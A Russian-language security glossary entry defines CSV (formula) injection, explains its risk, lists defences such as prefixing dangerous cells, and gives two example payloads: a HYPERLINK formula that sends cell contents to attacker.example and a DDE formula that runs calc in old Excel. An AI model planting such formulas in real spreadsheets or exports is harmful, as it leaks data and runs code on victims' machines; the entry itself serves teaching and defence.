CSV-инъекция
Что такое CSV-инъекция?
CSV-инъекцияАтака, при которой в экспортируемые CSV-файлы внедряются формулы, и при открытии файла в Excel или Sheets выполняются действия, заданные злоумышленником.
CSV-инъекция (инъекция формул) злоупотребляет тем, что табличные процессоры автоматически вычисляют ячейки, начинающиеся с =, +, -, @, табуляции или перевода строки. Если веб-приложение сохраняет ввод злоумышленника и затем экспортирует его в CSV, при открытии полученной книги могут срабатывать DDE, обращения к удалённым URL, утечка данных и загрузка вредоносного ПО. Риск проявляется у потребителя файла, а не в базе данных, поэтому его легко пропустить при ревью кода. Защита: добавлять одинарную кавычку или другой безопасный префикс к каждой ячейке, начинающейся с опасного символа, валидировать и экранировать поля перед экспортом, предупреждать пользователей перед открытием недоверенных таблиц.
● Примеры
- 01
Поле имени в форме обратной связи принимает =HYPERLINK("https://attacker.example/?l="&A2,"Клик") и при открытии экспорта утечёт другие ячейки.
- 02
Экспортированный CRM-отчёт с =cmd|'/c calc'!A1 запускает DDE в старых версиях Excel.
● Частые вопросы
Что такое CSV-инъекция?
Атака, при которой в экспортируемые CSV-файлы внедряются формулы, и при открытии файла в Excel или Sheets выполняются действия, заданные злоумышленником. Относится к категории Атаки и угрозы в кибербезопасности.
Что означает CSV-инъекция?
Атака, при которой в экспортируемые CSV-файлы внедряются формулы, и при открытии файла в Excel или Sheets выполняются действия, заданные злоумышленником.
Как защититься от CSV-инъекция?
Защита от CSV-инъекция обычно сочетает технические меры и операционные практики, как описано в определении выше.
Какие есть другие названия CSV-инъекция?
Распространённые альтернативные названия: Инъекция формул, Инъекция макросов Excel.